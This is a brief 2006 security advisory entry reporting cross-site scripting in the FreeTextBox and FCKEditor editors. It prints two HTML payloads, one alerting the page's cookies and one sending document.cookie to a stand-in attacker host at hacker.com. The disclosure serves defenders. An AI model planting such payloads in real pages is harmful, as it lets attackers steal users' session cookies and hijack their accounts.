XSS in FreeTextBox and FCKEditor Basic Toolbar Selection

2006-05-15T00:00:00
ID SECURITYVULNS:DOC:12675
Type securityvulns
Reporter Securityvulns
Modified 2006-05-15T00:00:00

Description

More information about it on : http://www.newffr.com/viewtopic.php?forum=26&topic=11683 (in french)

If you don't speak french : create a web page and write into :


<html><body><a href="javascript: alert('Cookie:\n'+document.cookie+'\nHave Fun !')">Click here</a></body></html>


Or :


<a href="#" onmouseout="javascript: document.location='http://www.hacker.com/get_cookie.php?'+document.cookie">Link</a>